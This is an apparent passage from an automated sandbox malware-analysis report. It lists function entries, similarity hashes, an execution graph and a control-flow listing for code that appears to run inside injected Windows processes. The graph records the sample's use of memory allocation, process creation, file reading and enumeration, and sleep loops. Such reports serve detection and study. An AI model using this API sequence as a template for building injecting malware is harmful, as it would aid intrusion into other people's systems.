                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      • Opcode ID: fdda8eef502688f5fcb94f28bd09eea064d03b83497aabf3408c69b94af7444e
                                                                                                                      • Instruction ID: 5725878e4ee56d5bde6ff9d012d48e6e3ed2a15907e48c3c18d3ca7f7f2006a4
                                                                                                                      • Opcode Fuzzy Hash: fdda8eef502688f5fcb94f28bd09eea064d03b83497aabf3408c69b94af7444e
                                                                                                                      • Instruction Fuzzy Hash: E941E3713047028FCB24DE28CC44FAAB7E6FB89710F000A2DEC5ADB690D770E805AB91
                                                                                                                      Function 0576B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 057A728C
                                                                                                                      Strings
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 057A7294
                                                                                                                      • RTL: Resource at %p, xrefs: 057A72A3
                                                                                                                      • RTL: Re-Waiting, xrefs: 057A72C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                      • Opcode ID: e306afcdb9faac6cc2aacf27d7d01ba8947dc6c3fcdb451a4651b62d3280c62e
                                                                                                                      • Instruction ID: 9c09c5ae1de2fde5db517a39b2cdb8a38dc7863ae0d9df6623c47eef92058eb3
                                                                                                                      • Opcode Fuzzy Hash: e306afcdb9faac6cc2aacf27d7d01ba8947dc6c3fcdb451a4651b62d3280c62e
                                                                                                                      • Instruction Fuzzy Hash: 3141E132704606ABDB25DE25CC45F6ABBB6FB85710F100629FD59DB280EB30E842E7D1
                                                                                                                      Function 05777D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-
                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction ID: 4d171795fb262f78430f9fdab4dbbfe5ff3ee120347fe34c1291d4bcb00b0c98
                                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction Fuzzy Hash: 9591D3B0F0421E9BDF2CCE69E985ABEB7A6FF44320F54451AE861E72C0D7708942E751
                                                                                                                      Function 05739126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280
                                                                                                                      • Opcode ID: 89918831ddadc4f5256bc34a2407489bf6b4a1010a718da8ccde8fbaf381bdbc
                                                                                                                      • Instruction ID: 65e94584970465375cbc3e3edcad20ad737086ce575a777288e571db5004b243
                                                                                                                      • Opcode Fuzzy Hash: 89918831ddadc4f5256bc34a2407489bf6b4a1010a718da8ccde8fbaf381bdbc
                                                                                                                      • Instruction Fuzzy Hash: 8E812B76D002699BDB35DF54CC49BEEB7B4AB48710F0041DAEA09B7681E7705E84DFA0

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                      Signature Coverage:1.6%
                                                                                                                      Total number of Nodes:438
                                                                                                                      Total number of Limit Nodes:70
                                                                                                                      execution_graph 78294 2a9a060 78299 2a99d90 78294->78299 78296 2a9a06d 78313 2a99a30 78296->78313 78298 2a9a089 78300 2a99db5 78299->78300 78324 2a97710 78300->78324 78303 2a99ef2 78303->78296 78305 2a99f09 78305->78296 78306 2a99f00 78306->78305 78308 2a99ff1 78306->78308 78339 2a99490 78306->78339 78310 2a9a049 78308->78310 78348 2a997f0 78308->78348 78352 2aa97c0 78310->78352 78314 2a99a46 78313->78314 78321 2a99a51 78313->78321 78315 2aa98a0 RtlAllocateHeap 78314->78315 78315->78321 78316 2a99a67 78316->78298 78317 2a97710 GetFileAttributesW 78317->78321 78318 2a99d5e 78319 2a99d77 78318->78319 78320 2aa97c0 RtlFreeHeap 78318->78320 78319->78298 78320->78319 78321->78316 78321->78317 78321->78318 78322 2a99490 RtlFreeHeap 78321->78322 78323 2a997f0 RtlFreeHeap 78321->78323 78322->78321 78323->78321 78325 2a97731 78324->78325 78326 2a97738 GetFileAttributesW 78325->78326 78327 2a97743 78325->78327 78326->78327 78327->78303 78328 2aa1df0 78327->78328 78329 2aa1dfe 78328->78329 78330 2aa1e05 78328->78330 78329->78306 78355 2a93e10 78330->78355 78333 2aa1e49 78338 2aa1fe4 78333->78338 78359 2aa98a0 78333->78359 78336 2aa97c0 RtlFreeHeap 78336->78338 78337 2aa1e62 78337->78336 78337->78338 78338->78306 78340 2a994b6 78339->78340 78366 2a9ccd0 78340->78366 78342 2a9951d 78344 2a996a0 78342->78344 78345 2a9953b 78342->78345 78343 2a99685 78343->78306 78344->78343 78346 2a99350 RtlFreeHeap 78344->78346 78345->78343 78371 2a99350 78345->78371 78346->78344 78349 2a99816 78348->78349 78350 2a9ccd0 RtlFreeHeap 78349->78350 78351 2a99892 78350->78351 78351->78308 78379 2aa7c60 78352->78379 78354 2a9a050 78354->78296 78356 2a93e34 78355->78356 78357 2a93e70 LdrLoadDll 78356->78357 78358 2a93e3b 78356->78358 78357->78358 78358->78333 78362 2aa18c0 LdrLoadDll 78358->78362 78363 2aa7c20 78359->78363 78361 2aa98bb 78361->78337 78362->78333 78364 2aa7c3a 78363->78364 78365 2aa7c48 RtlAllocateHeap 78364->78365 78365->78361 78368 2a9cce6 78366->78368 78367 2a9ccf0 78367->78342 78368->78367 78369 2aa97c0 RtlFreeHeap 78368->78369 78370 2a9cd29 78369->78370 78370->78342 78372 2a99366 78371->78372 78375 2a9cd40 78372->78375 78374 2a9946c 78374->78345 78376 2a9cd64 78375->78376 78377 2a9cdfc 78376->78377 78378 2aa97c0 RtlFreeHeap 78376->78378 78377->78374 78378->78377 78380 2aa7c7a 78379->78380 78381 2aa7c88 RtlFreeHeap 78380->78381 78381->78354 78382 2a90460 78383 2a9047a 78382->78383 78384 2a93e10 LdrLoadDll 78383->78384 78385 2a90498 78384->78385 78386 2a904dd 78385->78386 78387 2a904cc PostThreadMessageW 78385->78387 78387->78386 78388 2a967a0 78389 2a967bc 78388->78389 78390 2a9680c 78388->78390 78389->78390 78398 2aa7930 78389->78398 78391 2a9692f 78390->78391 78402 2a95bc0 NtClose LdrInitializeThunk LdrInitializeThunk 78390->78402 78393 2a967d7 78401 2a95bc0 NtClose LdrInitializeThunk LdrInitializeThunk 78393->78401 78395 2a96909 78395->78391 78403 2a95d90 NtClose LdrInitializeThunk LdrInitializeThunk 78395->78403 78399 2aa794a 78398->78399 78400 2aa7958 NtClose 78399->78400 78400->78393 78401->78390 78402->78395 78403->78391 78404 2aa78a0 78405 2aa7906 78404->78405 78407 2aa78c1 78404->78407 78406 2aa7919 NtDeleteFile 78405->78406 78408 2aa7660 78409 2aa7709 78408->78409 78411 2aa7688 78408->78411 78410 2aa771c NtCreateFile 78409->78410 78417 2aa07a0 78418 2aa07bc 78417->78418 78419 2aa07f8 78418->78419 78420 2aa07e4 78418->78420 78422 2aa7930 NtClose 78419->78422 78421 2aa7930 NtClose 78420->78421 78423 2aa07ed 78421->78423 78424 2aa0801 78422->78424 78427 2aa98e0 RtlAllocateHeap 78424->78427 78426 2aa080c 78427->78426 78433 31e2ad0 LdrInitializeThunk 78434 2a98f7b 78435 2a98f8a 78434->78435 78436 2aa97c0 RtlFreeHeap 78435->78436 78437 2a98f91 78435->78437 78436->78437 78438 2a892b0 78439 2a892bf 78438->78439 78440 2a89300 78439->78440 78441 2a892ed CreateThread 78439->78441 78442 2a8ae70 78444 2a8c4e1 78442->78444 78445 2aa9730 78442->78445 78448 2aa7a80 78445->78448 78447 2aa9761 78447->78444 78449 2aa7b07 78448->78449 78451 2aa7aa4 78448->78451 78450 2aa7b1a NtAllocateVirtualMemory 78449->78450 78450->78447 78451->78447 78452 2a9f1b0 78453 2a9f1cd 78452->78453 78454 2a93e10 LdrLoadDll 78453->78454 78455 2a9f1eb 78454->78455 78461 2aa6fb0 78462 2aa6fca 78461->78462 78465 31e2df0 LdrInitializeThunk 78462->78465 78463 2aa6fef 78465->78463 78466 2aa0b30 78470 2aa0b3f 78466->78470 78467 2aa0b83 78468 2aa97c0 RtlFreeHeap 78467->78468 78469 2aa0b90 78468->78469 78470->78467 78471 2aa0bc1 78470->78471 78473 2aa0bc6 78470->78473 78472 2aa97c0 RtlFreeHeap 78471->78472 78472->78473 78474 2aa0331 78486 2aa77c0 78474->78486 78476 2aa0352 78477 2aa0370 78476->78477 78478 2aa0385 78476->78478 78479 2aa7930 NtClose 78477->78479 78480 2aa7930 NtClose 78478->78480 78481 2aa0379 78479->78481 78483 2aa038e 78480->78483 78482 2aa03ba 78483->78482 78484 2aa97c0 RtlFreeHeap 78483->78484 78485 2aa03ae 78484->78485 78487 2aa7859 78486->78487 78489 2aa77e4 78486->78489 78488 2aa786c NtReadFile 78487->78488 78488->78476 78489->78476 78490 2a96a0b 78491 2a96a12 78490->78491 78492 2a969aa 78490->78492 78493 2a969d2 78492->78493 78495 2a9a560 78492->78495 78496 2a9a586 78495->78496 78497 2a9a7a5 78496->78497 78522 2aa7ce0 78496->78522 78497->78493 78499 2a9a5fc 78499->78497 78525 2aaa9d0 78499->78525 78501 2a9a618 78501->78497 78502 2a9a6e9 78501->78502 78531 2aa7000 78501->78531 78504 2a95040 LdrInitializeThunk 78502->78504 78506 2a9a708 78502->78506 78504->78506 78511 2a9a78d 78506->78511 78543 2aa6bd0 78506->78543 78507 2a9a6d1 78539 2a974c0 78507->78539 78509 2a9a67d 78509->78497 78509->78507 78510 2a9a6af 78509->78510 78535 2a95040 78509->78535 78558 2aa31d0 LdrInitializeThunk 78510->78558 78513 2a974c0 LdrInitializeThunk 78511->78513 78517 2a9a79b 78513->78517 78517->78493 78518 2a9a764 78548 2aa6c70 78518->78548 78520 2a9a77e 78553 2aa6db0 78520->78553 78523 2aa7cfd 78522->78523 78524 2aa7d0e CreateProcessInternalW 78523->78524 78524->78499 78526 2aaa940 78525->78526 78527 2aa98a0 RtlAllocateHeap 78526->78527 78528 2aaa99d 78526->78528 78529 2aaa97a 78527->78529 78528->78501 78530 2aa97c0 RtlFreeHeap 78529->78530 78530->78528 78532 2aa701a 78531->78532 78559 31e2c0a 78532->78559 78533 2a9a674 78533->78502 78533->78509 78536 2a9504d 78535->78536 78562 2aa71c0 78536->78562 78538 2a9507b 78538->78510 78540 2a974d3 78539->78540 78568 2aa6f10 78540->78568 78542 2a974fe 78542->78493 78544 2aa6bf4 78543->78544 78545 2aa6c3f 78543->78545 78544->78518 78574 31e39b0 LdrInitializeThunk 78545->78574 78546 2aa6c61 78546->78518 78549 2aa6cdf 78548->78549 78551 2aa6c94 78548->78551 78575 31e4340 LdrInitializeThunk 78549->78575 78550 2aa6d01 78550->78520 78551->78520 78554 2aa6e1f 78553->78554 78556 2aa6dd4 78553->78556 78576 31e2fb0 LdrInitializeThunk 78554->78576 78555 2aa6e41 78555->78511 78556->78511 78558->78507 78560 31e2c1f LdrInitializeThunk 78559->78560 78561 31e2c11 78559->78561 78560->78533 78561->78533 78563 2aa725c 78562->78563 78564 2aa71e1 78562->78564 78567 31e2d10 LdrInitializeThunk 78563->78567 78564->78538 78565 2aa729e 78565->78538 78567->78565 78569 2aa6f7d 78568->78569 78571 2aa6f31 78568->78571 78573 31e2dd0 LdrInitializeThunk 78569->78573 78570 2aa6f9f 78570->78542 78571->78542 78573->78570 78574->78546 78575->78550 78576->78555 78577 2a92a4c 78582 2a97140 78577->78582 78580 2aa7930 NtClose 78581 2a92a71 78580->78581 78583 2a9715a 78582->78583 78587 2a92a5c 78582->78587 78588 2aa70a0 78583->78588 78586 2aa7930 NtClose 78586->78587 78587->78580 78587->78581 78589 2aa70bd 78588->78589 78592 31e35c0 LdrInitializeThunk 78589->78592 78590 2a9722a 78590->78586 78592->78590 78593 2a950c0 78594 2a974c0 LdrInitializeThunk 78593->78594 78595 2a950f0 78593->78595 78594->78595 78597 2a9511c 78595->78597 78598 2a97440 78595->78598 78599 2a97484 78598->78599 78600 2a974a5 78599->78600 78605 2aa6d10 78599->78605 78600->78595 78602 2a97495 78603 2a974b1 78602->78603 78604 2aa7930 NtClose 78602->78604 78603->78595 78604->78600 78606 2aa6d7c 78605->78606 78607 2aa6d31 78605->78607 78610 31e4650 LdrInitializeThunk 78606->78610 78607->78602 78608 2aa6d9e 78608->78602 78610->78608 78611 2a9b800 78613 2a9b829 78611->78613 78612 2a9b92d 78613->78612 78614 2a9b8d3 FindFirstFileW 78613->78614 78614->78612 78615 2a9b8ee 78614->78615 78616 2a9b914 FindNextFileW 78615->78616 78616->78615 78617 2a9b926 FindClose 78616->78617 78617->78612 78618 2aaa900 78619 2aa97c0 RtlFreeHeap 78618->78619 78620 2aaa915 78619->78620 78622 2a920d8 78625 2a95930 78622->78625 78624 2a92103 78626 2a95963 78625->78626 78627 2a95987 78626->78627 78632 2aa74e0 78626->78632 78627->78624 78629 2a959aa 78629->78627 78630 2aa7930 NtClose 78629->78630 78631 2a95a2a 78630->78631 78631->78624 78633 2aa74fa 78632->78633 78636 31e2ca0 LdrInitializeThunk 78633->78636 78634 2aa7523 78634->78629 78636->78634 78637 2a97b9e 78638 2a97ba3 78637->78638 78639 2a97b62 78638->78639 78641 2a965f0 LdrInitializeThunk LdrInitializeThunk 78638->78641 78641->78639 78642 2a89310 78643 2a897ea 78642->78643 78645 2a89ca1 78643->78645 78646 2aa9450 78643->78646 78647 2aa9476 78646->78647 78652 2a83d50 78647->78652 78649 2aa9482 78650 2aa94b0 78649->78650 78655 2aa3fd0 78649->78655 78650->78645 78659 2a92b50 78652->78659 78654 2a83d5d 78654->78649 78656 2aa402a 78655->78656 78658 2aa4037 78656->78658 78670 2a91020 78656->78670 78658->78650 78660 2a92b67 78659->78660 78662 2a92b7d 78660->78662 78663 2aa8360 78660->78663 78662->78654 78665 2aa8378 78663->78665 78664 2aa839c 78664->78662 78665->78664 78666 2aa7000 LdrInitializeThunk 78665->78666 78667 2aa83eb 78666->78667 78668 2aa97c0 RtlFreeHeap 78667->78668 78669 2aa8404 78668->78669 78669->78662 78671 2a9105b 78670->78671 78686 2a97250 78671->78686 78673 2a91063 78674 2aa98a0 RtlAllocateHeap 78673->78674 78684 2a91316 78673->78684 78675 2a91079 78674->78675 78676 2aa98a0 RtlAllocateHeap 78675->78676 78677 2a91087 78676->78677 78678 2aa98a0 RtlAllocateHeap 78677->78678 78679 2a91098 78678->78679 78685 2a9111f 78679->78685 78701 2a96090 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 78679->78701 78681 2a93e10 LdrLoadDll 78682 2a912d6 78681->78682 78697 2aa66f0 78682->78697 78684->78658 78685->78681 78687 2a9727c 78686->78687 78688 2a97140 2 API calls 78687->78688 78689 2a9729f 78688->78689 78690 2a972a9 78689->78690 78691 2a972c1 78689->78691 78692 2a972b4 78690->78692 78694 2aa7930 NtClose 78690->78694 78693 2a972dd 78691->78693 78695 2aa7930 NtClose 78691->78695 78692->78673 78693->78673 78694->78692 78696 2a972d3 78695->78696 78696->78673 78698 2aa674a 78697->78698 78700 2aa6757 78698->78700 78702 2a91330 78698->78702 78700->78684 78701->78685 78705 2a91350 78702->78705 78718 2a97520 78702->78718 78704 2a91835 78704->78700 78705->78704 78722 2aa0170 78705->78722 78708 2a9154e 78710 2aaa9d0 2 API calls 78708->78710 78709 2a913ae 78709->78704 78725 2aaa8a0 78709->78725 78712 2a91563 78710->78712 78711 2a974c0 LdrInitializeThunk 78714 2a9158e 78711->78714 78712->78714 78730 2a8ffe0 78712->78730 78714->78704 78714->78711 78715 2a8ffe0 LdrInitializeThunk 78714->78715 78715->78714 78716 2a916bc 78716->78714 78717 2a974c0 LdrInitializeThunk 78716->78717 78717->78716 78719 2a9752d 78718->78719 78720 2a9754e SetErrorMode 78719->78720 78721 2a97555 78719->78721 78720->78721 78721->78705 78723 2aa9730 NtAllocateVirtualMemory 78722->78723 78724 2aa0191 78723->78724 78724->78709 78726 2aaa8b0 78725->78726 78727 2aaa8b6 78725->78727 78726->78708 78728 2aa98a0 RtlAllocateHeap 78727->78728 78729 2aaa8dc 78728->78729 78729->78708 78733 2aa7b90 78730->78733 78734 2aa7baa 78733->78734 78737 31e2c70 LdrInitializeThunk 78734->78737 78735 2a90002 78735->78716 78737->78735 78738 2a9e8d0 78739 2a9e934 78738->78739 78740 2a95930 2 API calls 78739->78740 78742 2a9ea5d 78740->78742 78741 2a9ea64 78742->78741 78767 2a95a40 78742->78767 78744 2a9ec03 78745 2a9eae0 78745->78744 78746 2a9ec12 78745->78746 78771 2a9e6b0 78745->78771 78747 2aa7930 NtClose 78746->78747 78749 2a9ec1c 78747->78749 78750 2a9eb15 78750->78746 78751 2a9eb20 78750->78751 78752 2aa98a0 RtlAllocateHeap 78751->78752 78753 2a9eb49 78752->78753 78754 2a9eb68 78753->78754 78755 2a9eb52 78753->78755 78780 2a9e5a0 CoInitialize 78754->78780 78756 2aa7930 NtClose 78755->78756 78759 2a9eb5c 78756->78759 78758 2a9eb76 78782 2aa7440 78758->78782 78761 2a9ebf2 78762 2aa7930 NtClose 78761->78762 78763 2a9ebfc 78762->78763 78764 2aa97c0 RtlFreeHeap 78763->78764 78764->78744 78765 2a9eb94 78765->78761 78766 2aa7440 LdrInitializeThunk 78765->78766 78766->78765 78768 2a95a65 78767->78768 78786 2aa72f0 78768->78786 78772 2a9e6cc 78771->78772 78773 2a93e10 LdrLoadDll 78772->78773 78775 2a9e6ea 78773->78775 78774 2a9e6f3 78774->78750 78775->78774 78776 2a93e10 LdrLoadDll 78775->78776 78777 2a9e7be 78776->78777 78778 2a93e10 LdrLoadDll 78777->78778 78779 2a9e81b 78777->78779 78778->78779 78779->78750 78781 2a9e605 78780->78781 78781->78758 78783 2aa745a 78782->78783 78791 31e2ba0 LdrInitializeThunk 78783->78791 78784 2aa7487 78784->78765 78787 2aa730d 78786->78787 78790 31e2c60 LdrInitializeThunk 78787->78790 78788 2a95ad9 78788->78745 78790->78788 78791->78784 78792 2a963d0 78793 2a963fa 78792->78793 78796 2a972f0 78793->78796 78795 2a96421 78797 2a9730d 78796->78797 78803 2aa70f0 78797->78803 78799 2a9735d 78800 2a97364 78799->78800 78801 2aa71c0 LdrInitializeThunk 78799->78801 78800->78795 78802 2a9738d 78801->78802 78802->78795 78804 2aa717d 78803->78804 78805 2aa7114 78803->78805 78808 31e2f30 LdrInitializeThunk 78804->78808 78805->78799 78806 2aa71b3 78806->78799 78808->78806 78809 2a95150 78810 2a95186 78809->78810 78811 2aa7000 LdrInitializeThunk 78809->78811 78814 2aa79c0 78810->78814 78811->78810 78813 2a9519b 78815 2aa7a3e 78814->78815 78816 2aa79e1 78814->78816 78819 31e2e80 LdrInitializeThunk 78815->78819 78816->78813 78817 2aa7a6c 78817->78813 78819->78817 78820 2aa6e50 78821 2aa6ece 78820->78821 78823 2aa6e71 78820->78823 78825 31e2ee0 LdrInitializeThunk 78821->78825 78822 2aa6efc 78825->78822 78826 2aa4990 78827 2aa49ea 78826->78827 78829 2aa49f7 78827->78829 78830 2aa2520 78827->78830 78831 2aa2527 78830->78831 78832 2aa9730 NtAllocateVirtualMemory 78831->78832 78834 2aa2561 78831->78834 78832->78834 78833 2a93e10 LdrLoadDll 78836 2aa25a7 78833->78836 78834->78833 78837 2aa2666 78834->78837 78835 2aa25e0 Sleep 78835->78836 78836->78835 78836->78837 78839 2aa48f0 LdrLoadDll Sleep NtAllocateVirtualMemory 78836->78839 78837->78829 78839->78836

                                                                                                                      Executed Functions

                                                                                                                      Function 02A89310 Relevance: 44.2, Strings: 35, Instructions: 453COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 26 2a89310-2a897e0 27 2a897ea-2a897f6 26->27 28 2a897f8-2a89819 27->28 29 2a8981b-2a89833 27->29 28->27 30 2a89844-2a8984d 29->30 31 2a8984f-2a89858 30->31 32 2a89865-2a8986f 30->32 34 2a8985a-2a89860 31->34 35 2a89863 31->35 33 2a89880-2a8988c 32->33 37 2a8988e-2a8989e 33->37 38 2a898b1-2a898c4 33->38 34->35 35->30 39 2a898af 37->39 40 2a898a0-2a898a9 37->40 41 2a898cb-2a898d4 38->41 39->33 40->39 43 2a898da-2a898e4 41->43 44 2a89aa7-2a89ab1 41->44 46 2a898f5-2a89901 43->46 45 2a89ac2-2a89ace 44->45 47 2a89ae0-2a89ae9 45->47 48 2a89ad0-2a89ad6 45->48 49 2a89911-2a89918 46->49 50 2a89903-2a8990f 46->50 53 2a89aeb-2a89b0c 47->53 54 2a89b0e-2a89b15 47->54 51 2a89ad8-2a89adb 48->51 52 2a89ade 48->52 56 2a8991a-2a8993d 49->56 57 2a8993f-2a89942 49->57 50->46 51->52 52->45 53->47 59 2a89b1b-2a89b25 54->59 60 2a89d2c-2a89d35 54->60 56->49 61 2a89948-2a8994f 57->61 64 2a89b36-2a89b42 59->64 62 2a89981-2a8998b 61->62 63 2a89951-2a8997f 61->63 65 2a899ac-2a899b6 62->65 66 2a8998d-2a899aa 62->66 63->61 67 2a89b64-2a89b6b 64->67 68 2a89b44-2a89b54 64->68 71 2a899b8-2a899d7 65->71 72 2a899ea-2a89a0c 65->72 66->62 69 2a89b6d-2a89b83 67->69 70 2a89b90-2a89b9a 67->70 73 2a89b62 68->73 74 2a89b56-2a89b5f 68->74 76 2a89b8e 69->76 77 2a89b85-2a89b8b 69->77 80 2a89bab-2a89bb7 70->80 78 2a899e8 71->78 79 2a899d9-2a899e2 71->79 81 2a89a4e-2a89a62 72->81 82 2a89a0e-2a89a18 72->82 73->64 74->73 76->67 77->76 78->65 79->78 83 2a89bb9-2a89bc5 80->83 84 2a89bd5-2a89bdf 80->84 86 2a89a73-2a89a7f 81->86 85 2a89a29-2a89a35 82->85 89 2a89bd3 83->89 90 2a89bc7-2a89bcd 83->90 93 2a89bf0-2a89bfc 84->93 91 2a89a4c 85->91 92 2a89a37-2a89a4a 85->92 87 2a89a8f-2a89aa2 86->87 88 2a89a81-2a89a8d 86->88 87->41 88->86 89->80 90->89 91->44 92->85 97 2a89bfe-2a89c07 93->97 98 2a89c14-2a89c1e 93->98 100 2a89c09-2a89c0f 97->100 101 2a89c12 97->101 99 2a89c2f-2a89c3b 98->99 103 2a89c3d-2a89c46 99->103 104 2a89c62-2a89c6c 99->104 100->101 101->93 105 2a89c48-2a89c4c 103->105 106 2a89c4d-2a89c4f 103->106 107 2a89c7d-2a89c89 104->107 105->106 108 2a89c60 106->108 109 2a89c51-2a89c5a 106->109 110 2a89c8b-2a89c9a 107->110 111 2a89c9c call 2aa9450 107->111 108->99 109->108 113 2a89c6e-2a89c77 110->113 115 2a89ca1-2a89ca8 111->115 113->107 116 2a89cda-2a89ce4 115->116 117 2a89caa-2a89cd8 115->117 118 2a89cf5-2a89d01 116->118 117->115 119 2a89d19-2a89d26 118->119 120 2a89d03-2a89d0c 118->120 119->60 121 2a89d0e-2a89d14 120->121 122 2a89d17 120->122 121->122 122->118
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: {$#$&$'$*h$33$6$7$9y$;$=$?#$B$EI$I$I$L$N}$O$Q$R$R$Z$a$b5$f$g$l$m$n>$p$p0${q$a$s
                                                                                                                      • API String ID: 0-3813558309
                                                                                                                      • Opcode ID: c45f8173c05a1223a1a6a62f14d2a5b6ef5784dd1502008284193c9c4f5aeaf9
                                                                                                                      • Instruction ID: b7587462337f5a49bd145585373db4b7d53e02e4197f934133261972445f5913
                                                                                                                      • Opcode Fuzzy Hash: c45f8173c05a1223a1a6a62f14d2a5b6ef5784dd1502008284193c9c4f5aeaf9
                                                                                                                      • Instruction Fuzzy Hash: 974281B0D0522ACBEB64DF45C9987EEBBB1BB44308F1081D9C5496B381DBB95AC9CF44
                                                                                                                      Function 02A9B800 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A9B8E4
                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02A9B91F
                                                                                                                      • FindClose.KERNELBASE(?), ref: 02A9B92A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3541575487-0
                                                                                                                      • Opcode ID: 8f494d78f6053d3683d1143fd56178c1211dd3bce78f95870a8982918ca8c55c
                                                                                                                      • Instruction ID: 2d65091d394913922be7061098c227823c173be88edc30e479d6a569a8891e04
                                                                                                                      • Opcode Fuzzy Hash: 8f494d78f6053d3683d1143fd56178c1211dd3bce78f95870a8982918ca8c55c
                                                                                                                      • Instruction Fuzzy Hash: 57315EB1A502087EDF20EB61DD85FEB77ADAF84708F144458B948A7180DB70AA858BA1
                                                                                                                      Function 02AA7660 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02AA774D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 9bd2a730a09e07d82a855ad11b4d81ceb6f29dde270fb06e65ddc43552f7c8d1
                                                                                                                      • Instruction ID: 11d7ed6e48f50635c1fc4526dd1002ad19e8f4f811edeba1f894266b73616d6a
                                                                                                                      • Opcode Fuzzy Hash: 9bd2a730a09e07d82a855ad11b4d81ceb6f29dde270fb06e65ddc43552f7c8d1
                                                                                                                      • Instruction Fuzzy Hash: 8031C4B5A01608AFCB14DF99D980EDFB7B9AF8C714F108209F918A3340D730A852CFA4
                                                                                                                      Function 02AA77C0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02AA7895
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: 9f0f689d9cc9475f85af43d48cff8d1af5f0337fc4f30012fa80292427d87117
                                                                                                                      • Instruction ID: 3651c4dac964183dc84542fb058b1590d5bdf1c8779afd4bad90c1f8d51d5a24
                                                                                                                      • Opcode Fuzzy Hash: 9f0f689d9cc9475f85af43d48cff8d1af5f0337fc4f30012fa80292427d87117
